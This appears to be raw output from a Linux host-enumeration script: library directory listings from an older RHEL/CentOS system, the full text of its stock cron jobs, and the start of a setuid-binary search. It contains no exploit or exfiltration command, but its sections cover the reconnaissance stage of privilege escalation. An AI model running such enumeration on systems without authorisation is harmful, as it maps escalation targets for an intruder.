-rwxr-xr-x 1 root root 18K 2011-09-23 23:52:26.000000000 +0500 libattr.so.1.1.0
-rwxr-xr-x 1 root root 18K 2012-08-13 18:41:06.000000000 +0500 libdl-2.12.so
-rwxr-xr-x 1 root root 193K 2012-08-13 19:05:24.000000000 +0500 libcidn-2.12.so
-rwxr-xr-x 1 root root 198K 2012-06-22 13:55:13.000000000 +0500 libext2fs.so.2.4
-rwxr-xr-x 1 root root 202K 2010-08-24 05:51:20.000000000 +0500 libidn.so.11.6.1
-rwxr-xr-x 1 root root 20K 2012-08-13 18:41:06.000000000 +0500 libSegFault.so
-rwxr-xr-x 1 root root 22K 2012-08-13 18:41:07.000000000 +0500 libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 235K 2012-02-25 01:54:16.000000000 +0400 libnspr4.so
-rwxr-xr-x 1 root root 243K 2011-12-07 22:01:08.000000000 +0400 libsepol.so.1
-rwxr-xr-x 1 root root 25K 2012-08-13 18:41:06.000000000 +0500 libnss_dns-2.12.so
-rwxr-xr-x 1 root root 260K 2011-09-23 20:48:08.000000000 +0500 libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 264K 2010-08-17 05:02:38.000000000 +0500 libreadline.so.6.0
-rwxr-xr-x 1 root root 264K 2012-09-19 15:40:48.000000000 +0500 libgssapi_krb5.so.2.2
-rwxr-xr-x 1 root root 275K 2011-07-19 04:07:26.000000000 +0500 libgobject-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 27K 2012-06-22 13:53:53.000000000 +0500 libe2p.so.2.3
-rwxr-xr-x 1 root root 299K 2011-12-08 01:48:35.000000000 +0400 libldap-2.4.so.2.5.6
-rwxr-xr-x 1 root root 3.3M 2011-12-08 04:15:56.000000000 +0400 libnss_wins.so.2
-rwxr-xr-x 1 root root 3.6K 2012-02-25 09:26:45.000000000 +0400 libiptc.so.0.0.0
-rwxr-xr-x 1 root root 3.9K 2010-08-23 02:08:18.000000000 +0500 libaio.so.1.0.0
-rwxr-xr-x 1 root root 3.9K 2010-08-23 02:08:18.000000000 +0500 libaio.so.1.0.1
-rwxr-xr-x 1 root root 30K 2011-12-07 20:51:10.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x 1 root root 31K 2012-08-13 18:41:06.000000000 +0500 libthread_db-1.0.so
-rwxr-xr-x 1 root root 324K 2011-12-08 01:48:35.000000000 +0400 libldap_r-2.4.so.2.5.6
-rwxr-xr-x 1 root root 330K 2011-07-19 23:32:50.000000000 +0500 libnl.so.1.1
-rwxr-xr-x 1 root root 375K 2011-12-08 04:27:00.000000000 +0400 libfreebl3.so
-rwxr-xr-x 1 root root 38K 2012-08-13 18:41:08.000000000 +0500 libcrypt-2.12.so
-rwxr-xr-x 1 root root 39K 2012-08-13 18:41:08.000000000 +0500 librt-2.12.so
-rwxr-xr-x 1 root root 40K 2012-08-13 18:41:08.000000000 +0500 libnss_compat-2.12.so
-rwxr-xr-x 1 root root 425K 2012-01-15 23:47:34.000000000 +0400 libsyslog-ng.so.0.0.0
-rwxr-xr-x 1 root root 468K 2011-12-07 23:15:49.000000000 +0400 libgcrypt.so.11.5.3
-rwxr-xr-x 1 root root 49K 2012-08-13 18:41:06.000000000 +0500 libnss_nis-2.12.so
-rwxr-xr-x 1 root root 582K 2012-08-13 19:05:25.000000000 +0500 libm-2.12.so
-rwxr-xr-x 1 root root 58K 2012-08-13 18:41:06.000000000 +0500 libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 58K 2012-08-13 18:41:07.000000000 +0500 libnss_files-2.12.so
-rwxr-xr-x 1 root root 681K 2011-07-19 04:07:26.000000000 +0500 libgio-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 69K 2011-06-25 06:44:14.000000000 +0500 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 74K 2011-12-07 21:51:14.000000000 +0400 libz.so.1.2.3
-rwxr-xr-x 1 root root 8.3K 2012-08-13 19:05:25.000000000 +0500 libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 892K 2012-09-19 15:40:48.000000000 +0500 libkrb5.so.3.3
-rwxr-xr-x 1 root root 9.1K 2012-02-25 09:26:45.000000000 +0400 libipq.so.0.0.0
-rwxr-xr-x 1 root root 918K 2011-07-19 04:07:26.000000000 +0500 libglib-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 939K 2011-12-07 22:22:39.000000000 +0400 libasound.so.2.0.0
-rwxr-xr-x 1 root root 952K 2010-11-11 07:07:19.000000000 +0400 libdb-4.2.so
-rwxr-xr-x 1 root root 96K 2010-08-18 20:33:59.000000000 +0500 libtinfo.so.5.7
-rwxr-xr-x 1 root root 1.8M 2012-08-13 18:41:07.000000000 +0500 libc-2.12.so
-rwxr-xr-x 1 root root 1017K 2010-11-11 07:07:19.000000000 +0400 libdb-4.3.so
-rwxr-xr-x 1 root root 101K 2012-08-13 18:41:08.000000000 +0500 libresolv-2.12.so
-rwxr-xr-x 1 root root 112K 2012-08-13 18:41:08.000000000 +0500 libnsl-2.12.so
-rwxr-xr-x 1 root root 118K 2011-12-08 04:21:32.000000000 +0400 libselinux.so.1
-rwxr-xr-x 1 root root 118K 2012-06-22 10:26:58.000000000 +0500 libgcc_s-4.4.6-20120305.so.1
-rwxr-xr-x 1 root root 129K 2012-08-13 18:41:07.000000000 +0500 libpthread-2.12.so
-rwxr-xr-x 1 root root 137K 2010-08-18 20:33:59.000000000 +0500 libncurses.so.5.7
-rwxr-xr-x 1 root root 138K 2012-08-13 18:41:06.000000000 +0500 ld-2.12.so
-rwxr-xr-x 1 root root 187K 2012-08-13 18:41:06.000000000 +0500 libcidn-2.12.so
-rwxr-xr-x 1 root root 191K 2010-08-18 20:33:59.000000000 +0500 libncursesw.so.5.7
-rwxr-xr-x 1 root root 196K 2012-08-13 18:41:07.000000000 +0500 libm-2.12.so
-rwxr-xr-x 1 root root 207K 2012-06-22 13:53:53.000000000 +0500 libext2fs.so.2.4
-rwxr-xr-x 1 root root 272K 2011-07-19 04:04:26.000000000 +0500 libgobject-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 294K 2011-12-08 04:24:02.000000000 +0400 libfreebl3.so
-rwxr-xr-x 1 root root 7.1K 2012-08-13 18:41:08.000000000 +0500 libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 707K 2011-07-19 04:04:26.000000000 +0500 libgio-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 931K 2011-07-19 04:04:26.000000000 +0500 libglib-2.0.so.0.2200.5
/lib/:
/lib64/:
dr-xr-xr-x 2 root root 4.0K 2010-11-11 11:40:15.000000000 +0400 tls
dr-xr-xr-x 6 root root 4.0K 2012-03-23 12:04:10.000000000 +0400 modules
dr-xr-xr-x 8 root root 12K 2012-12-18 15:32:59.000000000 +0400 .
dr-xr-xr-x 9 root root 4.0K 2012-08-16 08:08:41.000000000 +0500 .
drwxr-xr-x 2 root root 4.0K 2012-01-01 03:47:54.000000000 +0400 rsyslog
drwxr-xr-x 2 root root 4.0K 2012-02-20 03:46:13.000000000 +0400 syslog-ng
drwxr-xr-x 2 root root 4.0K 2012-04-16 10:42:54.000000000 +0500 xtables
drwxr-xr-x 2 root root 4.0K 2012-08-16 08:08:01.000000000 +0500 rtkaio
drwxr-xr-x 2 root root 4.0K 2011-12-08 01:17:19.000000000 +0400 firmware
drwxr-xr-x 2 root root 4.0K 2012-04-16 14:04:59.000000000 +0500 security
drwxr-xr-x 3 root root 4.0K 2013-11-07 04:19:46.000000000 +0400 security
drwxr-xr-x 3 root root 4.0K 2012-08-13 18:12:55.000000000 +0500 i686
drwxr-xr-x 3 root root 4.0K 2012-08-16 08:08:31.000000000 +0500 rtkaio
drwxr-xr-x 5 root root 4.0K 2012-03-09 03:46:25.000000000 +0400 udev
drwxr-xr-x 6 root root 4.0K 2011-09-13 22:42:39.000000000 +0500 terminfo
drwxr-xr-x 22 root root 4.0K 2013-11-08 02:00:02.000000000 +0400 ..
drwxr-xr-x 22 root root 4.0K 2013-11-08 02:00:02.000000000 +0400 ..
lrwxrwxrwx 1 root root 10 2012-08-16 08:08:01.000000000 +0500 ld-linux-x86-64.so.2 -> ld-2.12.so
lrwxrwxrwx 1 root root 12 2011-12-11 03:47:58.000000000 +0400 libnl.so.1 -> libnl.so.1.1
lrwxrwxrwx 1 root root 12 2012-08-16 08:08:01.000000000 +0500 libc.so.6 -> libc-2.12.so
lrwxrwxrwx 1 root root 12 2012-08-16 08:08:01.000000000 +0500 libm.so.6 -> libm-2.12.so
lrwxrwxrwx 1 root root 12 2012-08-16 08:08:14.000000000 +0500 libss.so.2 -> libss.so.2.0
lrwxrwxrwx 1 root root 13 2012-01-01 03:46:39.000000000 +0400 libz.so.1 -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:01.000000000 +0500 libdl.so.2 -> libdl-2.12.so
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:01.000000000 +0500 librt.so.1 -> librt-2.12.so
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:07.000000000 +0500 libe2p.so.2 -> libe2p.so.2.3
lrwxrwxrwx 1 root root 14 2012-01-01 03:46:39.000000000 +0400 libcap.so.2 -> libcap.so.2.16
lrwxrwxrwx 1 root root 14 2012-08-16 08:08:01.000000000 +0500 libanl.so.1 -> libanl-2.12.so
lrwxrwxrwx 1 root root 14 2012-08-16 08:08:01.000000000 +0500 libnsl.so.1 -> libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2012-10-30 03:51:47.000000000 +0400 libkrb5.so.3 -> libkrb5.so.3.3
lrwxrwxrwx 1 root root 15 2011-09-28 10:50:25.000000000 +0500 libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2011-09-28 10:50:25.000000000 +0500 libtinfo.so.5 -> libtinfo.so.5.7
lrwxrwxrwx 1 root root 15 2011-09-29 04:53:47.000000000 +0500 libnet.so.1 -> libnet.so.1.6.0
lrwxrwxrwx 1 root root 15 2012-01-01 03:46:40.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
lrwxrwxrwx 1 root root 15 2012-01-01 03:48:21.000000000 +0400 libnih.so.1 -> libnih.so.1.0.0
lrwxrwxrwx 1 root root 15 2012-02-26 03:46:21.000000000 +0400 libipq.so.0 -> libipq.so.0.0.0
lrwxrwxrwx 1 root root 15 2012-02-26 03:46:22.000000000 +0400 libipq.so -> libipq.so.0.0.0
lrwxrwxrwx 1 root root 15 2012-08-16 08:08:01.000000000 +0500 libcidn.so.1 -> libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2012-08-16 08:08:01.000000000 +0500 libutil.so.1 -> libutil-2.12.so
lrwxrwxrwx 1 root root 16 2011-09-28 10:50:25.000000000 +0500 libidn.so.11 -> libidn.so.11.6.1
lrwxrwxrwx 1 root root 16 2011-09-28 10:50:25.000000000 +0500 libpcre.so.0 -> libpcre.so.0.0.1
lrwxrwxrwx 1 root root 16 2011-09-28 10:50:25.000000000 +0500 libpopt.so.0 -> libpopt.so.0.0.0
lrwxrwxrwx 1 root root 16 2011-12-11 03:47:17.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
lrwxrwxrwx 1 root root 16 2012-01-01 03:46:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
lrwxrwxrwx 1 root root 16 2012-01-01 03:46:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.3.0
lrwxrwxrwx 1 root root 16 2012-01-01 03:48:18.000000000 +0400 libwrap.so -> libwrap.so.0.7.6
lrwxrwxrwx 1 root root 16 2012-02-26 03:46:21.000000000 +0400 libiptc.so.0 -> libiptc.so.0.0.0
lrwxrwxrwx 1 root root 16 2012-02-26 03:46:22.000000000 +0400 libiptc.so -> libiptc.so.0.0.0
lrwxrwxrwx 1 root root 16 2012-05-05 07:28:43.000000000 +0500 libpam.so.0 -> libpam.so.0.82.2
lrwxrwxrwx 1 root root 16 2012-08-16 08:08:01.000000000 +0500 libcrypt.so.1 -> libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2012-08-16 08:08:07.000000000 +0500 libext2fs.so.2 -> libext2fs.so.2.4
lrwxrwxrwx 1 root root 16 2012-10-30 03:51:47.000000000 +0400 libgssrpc.so.4 -> libgssrpc.so.4.1
lrwxrwxrwx 1 root root 17 2011-09-28 10:50:25.000000000 +0500 libncurses.so.5 -> libncurses.so.5.7
lrwxrwxrwx 1 root root 17 2012-01-01 03:46:42.000000000 +0400 libaudit.so.1 -> libaudit.so.1.0.0
lrwxrwxrwx 1 root root 17 2012-01-01 03:46:59.000000000 +0400 libblkid.so.1 -> libblkid.so.1.1.0
lrwxrwxrwx 1 root root 17 2012-01-01 03:47:38.000000000 +0400 libmount.so.1 -> libmount.so.1.1.0
lrwxrwxrwx 1 root root 17 2012-02-26 03:46:21.000000000 +0400 libip4tc.so.0 -> libip4tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2012-02-26 03:46:21.000000000 +0400 libip6tc.so.0 -> libip6tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2012-02-26 03:46:22.000000000 +0400 libip4tc.so -> libip4tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2012-02-26 03:46:22.000000000 +0400 libip6tc.so -> libip6tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2012-05-05 07:28:43.000000000 +0500 libpamc.so.0 -> libpamc.so.0.82.1
lrwxrwxrwx 1 root root 17 2012-08-16 08:08:01.000000000 +0500 libresolv.so.2 -> libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2012-08-16 08:08:06.000000000 +0500 libcom_err.so.2 -> libcom_err.so.2.1
lrwxrwxrwx 1 root root 17 2012-08-16 08:08:19.000000000 +0500 libexpat.so.1 -> libexpat.so.1.5.2
lrwxrwxrwx 1 root root 18 2011-09-28 10:50:25.000000000 +0500 libcap-ng.so.0 -> libcap-ng.so.0.0.0
lrwxrwxrwx 1 root root 18 2011-09-28 10:50:25.000000000 +0500 libncursesw.so.5 -> libncursesw.so.5.7
lrwxrwxrwx 1 root root 18 2011-09-28 10:50:25.000000000 +0500 libreadline.so.6 -> libreadline.so.6.0
lrwxrwxrwx 1 root root 18 2011-09-29 04:53:45.000000000 +0500 libevtlog.so.0 -> libevtlog.so.0.0.0
lrwxrwxrwx 1 root root 18 2011-12-11 03:47:28.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
lrwxrwxrwx 1 root root 18 2012-01-01 03:46:52.000000000 +0400 libkeyutils.so.1 -> libkeyutils.so.1.3
lrwxrwxrwx 1 root root 18 2012-01-01 03:47:09.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0
lrwxrwxrwx 1 root root 18 2012-01-01 03:48:20.000000000 +0400 libtirpc.so.1 -> libtirpc.so.1.0.10
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:01.000000000 +0500 libnss_dns.so.2 -> libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:01.000000000 +0500 libnss_nis.so.2 -> libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:01.000000000 +0500 libpthread.so.0 -> libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2012-10-30 03:51:47.000000000 +0400 libk5crypto.so.3 -> libk5crypto.so.3.1
lrwxrwxrwx 1 root root 19 2011-12-11 03:47:54.000000000 +0400 libgssglue.so.1 -> libgssglue.so.1.0.0
lrwxrwxrwx 1 root root 19 2012-01-01 03:46:42.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
lrwxrwxrwx 1 root root 19 2012-01-01 03:48:02.000000000 +0400 libgcrypt.so.11 -> libgcrypt.so.11.5.3
lrwxrwxrwx 1 root root 19 2012-02-26 03:46:21.000000000 +0400 libxtables.so.4 -> libxtables.so.4.0.0
lrwxrwxrwx 1 root root 19 2012-02-26 03:46:22.000000000 +0400 libxtables.so -> libxtables.so.4.0.0
lrwxrwxrwx 1 root root 19 2012-08-16 08:08:01.000000000 +0500 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 20 2012-01-01 03:47:19.000000000 +0400 liblber-2.4.so.2 -> liblber-2.4.so.2.5.6
lrwxrwxrwx 1 root root 20 2012-01-01 03:47:19.000000000 +0400 libldap-2.4.so.2 -> libldap-2.4.so.2.5.6
lrwxrwxrwx 1 root root 20 2012-01-01 03:47:19.000000000 +0400 libldif-2.4.so.2 -> libldif-2.4.so.2.5.6
lrwxrwxrwx 1 root root 20 2012-01-01 03:48:21.000000000 +0400 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
lrwxrwxrwx 1 root root 20 2012-08-16 08:08:01.000000000 +0500 libnss_files.so.2 -> libnss_files-2.12.so
lrwxrwxrwx 1 root root 21 2012-01-01 03:47:06.000000000 +0400 libfipscheck.so.1 -> libfipscheck.so.1.1.0
lrwxrwxrwx 1 root root 21 2012-01-01 03:47:29.000000000 +0400 libgpg-error.so.0 -> libgpg-error.so.0.5.0
lrwxrwxrwx 1 root root 21 2012-02-20 03:46:13.000000000 +0400 libsyslog-ng.so.0 -> libsyslog-ng.so.0.0.0
lrwxrwxrwx 1 root root 21 2012-05-05 07:28:43.000000000 +0500 libpam_misc.so.0 -> libpam_misc.so.0.82.0
lrwxrwxrwx 1 root root 21 2012-08-16 08:08:01.000000000 +0500 libnss_compat.so.2 -> libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2012-08-16 08:08:01.000000000 +0500 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2012-10-30 03:51:47.000000000 +0400 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
lrwxrwxrwx 1 root root 21 2012-10-30 03:51:47.000000000 +0400 libkrb5support.so.0 -> libkrb5support.so.0.1
lrwxrwxrwx 1 root root 22 2011-12-11 03:47:14.000000000 +0400 libgio-2.0.so.0 -> libgio-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 22 2012-01-01 03:47:19.000000000 +0400 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.5.6
lrwxrwxrwx 1 root root 22 2012-04-05 18:06:40.000000000 +0500 libaio.so.1 -> /lib64/libaio.so.1.0.1
lrwxrwxrwx 1 root root 22 2012-08-16 08:08:01.000000000 +0500 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 23 2011-12-11 03:47:14.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 23 2012-08-16 08:08:01.000000000 +0500 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 26 2011-12-11 03:47:14.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 26 2011-12-11 03:47:14.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 26 2011-12-11 03:47:14.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 27 2012-01-01 03:47:06.000000000 +0400 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac
lrwxrwxrwx 1 root root 28 2012-08-16 08:07:49.000000000 +0500 libgcc_s.so.1 -> libgcc_s-4.4.6-20120305.so.1
lrwxrwxrwx 1 root root 10 2012-08-16 08:08:31.000000000 +0500 ld-linux.so.2 -> ld-2.12.so
lrwxrwxrwx 1 root root 12 2012-08-16 08:08:31.000000000 +0500 libc.so.6 -> libc-2.12.so
lrwxrwxrwx 1 root root 12 2012-08-16 08:08:31.000000000 +0500 libm.so.6 -> libm-2.12.so
lrwxrwxrwx 1 root root 13 2012-01-01 03:48:30.000000000 +0400 libz.so.1 -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:31.000000000 +0500 libdl.so.2 -> libdl-2.12.so
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:31.000000000 +0500 librt.so.1 -> librt-2.12.so
lrwxrwxrwx 1 root root 13 2012-08-16 08:08:34.000000000 +0500 libe2p.so.2 -> libe2p.so.2.3
lrwxrwxrwx 1 root root 14 2012-08-16 08:08:15.000000000 +0500 cpp -> ../usr/bin/cpp
lrwxrwxrwx 1 root root 14 2012-08-16 08:08:31.000000000 +0500 libanl.so.1 -> libanl-2.12.so
lrwxrwxrwx 1 root root 14 2012-08-16 08:08:31.000000000 +0500 libnsl.so.1 -> libnsl-2.12.so
lrwxrwxrwx 1 root root 15 2011-09-28 10:50:25.000000000 +0500 libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2011-09-28 10:50:25.000000000 +0500 libtinfo.so.5 -> libtinfo.so.5.7
lrwxrwxrwx 1 root root 15 2012-01-01 03:48:38.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
lrwxrwxrwx 1 root root 15 2012-08-16 08:08:31.000000000 +0500 libcidn.so.1 -> libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2012-08-16 08:08:31.000000000 +0500 libutil.so.1 -> libutil-2.12.so
lrwxrwxrwx 1 root root 16 2011-12-11 03:49:10.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
lrwxrwxrwx 1 root root 16 2012-08-16 08:08:31.000000000 +0500 libcrypt.so.1 -> libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2012-08-16 08:08:34.000000000 +0500 libext2fs.so.2 -> libext2fs.so.2.4
lrwxrwxrwx 1 root root 17 2011-09-28 10:50:25.000000000 +0500 libncurses.so.5 -> libncurses.so.5.7
lrwxrwxrwx 1 root root 17 2012-08-16 08:08:31.000000000 +0500 libresolv.so.2 -> libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2012-08-16 08:08:34.000000000 +0500 libcom_err.so.2 -> libcom_err.so.2.1
lrwxrwxrwx 1 root root 18 2011-09-28 10:50:25.000000000 +0500 libncursesw.so.5 -> libncursesw.so.5.7
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:31.000000000 +0500 libnss_dns.so.2 -> libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:31.000000000 +0500 libnss_nis.so.2 -> libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2012-08-16 08:08:31.000000000 +0500 libpthread.so.0 -> libpthread-2.12.so
lrwxrwxrwx 1 root root 19 2012-08-16 08:08:31.000000000 +0500 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 20 2012-08-16 08:08:31.000000000 +0500 libnss_files.so.2 -> libnss_files-2.12.so
lrwxrwxrwx 1 root root 21 2012-08-16 08:08:31.000000000 +0500 libnss_compat.so.2 -> libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2012-08-16 08:08:31.000000000 +0500 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 22 2011-12-11 03:49:14.000000000 +0400 libgio-2.0.so.0 -> libgio-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 22 2012-08-16 08:08:31.000000000 +0500 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 23 2011-12-11 03:49:14.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 23 2012-08-16 08:08:31.000000000 +0500 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 26 2011-12-11 03:49:14.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 26 2011-12-11 03:49:14.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 26 2011-12-11 03:49:14.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2200.5
lrwxrwxrwx 1 root root 28 2012-08-16 08:08:38.000000000 +0500 libgcc_s.so.1 -> libgcc_s-4.4.6-20120305.so.1
total 24M
total 6.5M
**************************************************
* crontab info *
* *
**************************************************
[+]List of CRON tabs:
21619792 4 -rw-r--r-- 1 root root 164 Oct 10 2011 /etc/cron.d/vnstat
21620541 4 -rw-r--r-- 1 root root 251 Jul 19 2011 /etc/cron.d/sysstat
21620543 4 -rw-r--r-- 1 root root 113 Jul 19 2011 /etc/cron.d/0hourly
21488790 4 -rw-r--r-- 1 root root 905 Nov 12 2010 /etc/cron.daily/makewhatis.cron
21488903 4 -rwxr-xr-x 1 root root 365 Oct 16 2009 /etc/cron.daily/tmpwatch
21488792 4 -rwxr-xr-x 1 root root 196 Jun 25 2011 /etc/cron.daily/logrotate
21488791 4 -rw-r--r-- 1 root root 174 May 20 2009 /etc/cron.daily/mlocate.cron
21488897 4 -rw-r--r-- 1 root root 7 Sep 29 2011 /etc/cron.deny
21618895 4 -rwxr-xr-x 1 root root 424 Jul 19 2011 /etc/cron.hourly/0anacron
21489000 4 -rw-r--r-- 1 root root 457 Sep 27 2011 /etc/crontab
[+]List of USER CRON tabs:
=====================================
== READ cronfile: /etc/cron.d/vnstat
# run vnstat update every 5 minutes if installed
*/5 * * * * root if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi
== end of /etc/cron.d/vnstat
=====================================
=====================================
== READ cronfile: /etc/cron.d/sysstat
# Run system activity accounting tool every 10 minutes
*/10 * * * * root /usr/lib64/sa/sa1 -S DISK 1 1
# 0 * * * * root /usr/lib64/sa/sa1 -S DISK 600 6 &
# Generate a daily summary of process accounting at 23:53
53 23 * * * root /usr/lib64/sa/sa2 -A
== end of /etc/cron.d/sysstat
=====================================
=====================================
== READ cronfile: /etc/cron.d/0hourly
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly
== end of /etc/cron.d/0hourly
=====================================
=====================================
== READ cronfile: /etc/cron.daily/makewhatis.cron
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
# if MAKEWHATISDBUPDATES variable is set to "n" or "N", then the
# update will not passed
MDU=`sed -n -e 's/^[[:blank:]]*MAKEWHATISDBUPDATES[[:blank:]]*\(.\)[[:blank:]]*$/\1/p' < /etc/man.config`
([ "$MDU" == "n" ] || [ "$MDU" == "N" ]) && exit 0
trap "{ rm -f $LOCKFILE ; exit 255; }" EXIT
touch $LOCKFILE
# Rebuild the database if makewhatis was since last full run,
# otherwise just update with new pages
if [ ! -f /var/cache/man/whatis ] ||
find /usr/sbin/makewhatis -newer /var/cache/man/whatis |grep -q .
then
makewhatis -w
else
makewhatis -U -w
fi
exit 0
== end of /etc/cron.daily/makewhatis.cron
=====================================
=====================================
== READ cronfile: /etc/cron.daily/tmpwatch
#! /bin/sh
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
-x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
-X '/tmp/hsperfdata_*' 10d /tmp
/usr/sbin/tmpwatch "$flags" 30d /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
if [ -d "$d" ]; then
/usr/sbin/tmpwatch "$flags" -f 30d "$d"
fi
done
== end of /etc/cron.daily/tmpwatch
=====================================
=====================================
== READ cronfile: /etc/cron.daily/logrotate
#!/bin/sh
/usr/sbin/logrotate /etc/logrotate.conf >/dev/null 2>&1
EXITVALUE=$?
if [ $EXITVALUE != 0 ]; then
/usr/bin/logger -t logrotate "ALERT exited abnormally with [$EXITVALUE]"
fi
exit 0
== end of /etc/cron.daily/logrotate
=====================================
=====================================
== READ cronfile: /etc/cron.daily/mlocate.cron
#!/bin/sh
nodevs=$(< /proc/filesystems awk '$1 == "nodev" { print $2 }')
renice +19 -p $$ >/dev/null 2>&1
ionice -c2 -n7 -p $$ >/dev/null 2>&1
/usr/bin/updatedb -f "$nodevs"
== end of /etc/cron.daily/mlocate.cron
=====================================
=====================================
== READ cronfile: /etc/cron.deny
nobody
== end of /etc/cron.deny
=====================================
=====================================
== READ cronfile: /etc/cron.hourly/0anacron
#!/bin/bash
#in case file doesn't exist
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# in case anacron is already running,
# there will be log (daemon won't be running twice).
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power &> /dev/null
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
== end of /etc/cron.hourly/0anacron
=====================================
=====================================
== READ cronfile: /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
== end of /etc/crontab
=====================================
**************************************************
* FIND suid files *
* *
**************************************************
-rwsr-xr-x 1 root root 11K Apr 16 2012 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 35K Apr 16 2012 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 50K Dec 8 2011 /bin/umount
-rwsr-xr-x 1 root root 40K Jul 19 2011 /bin/ping
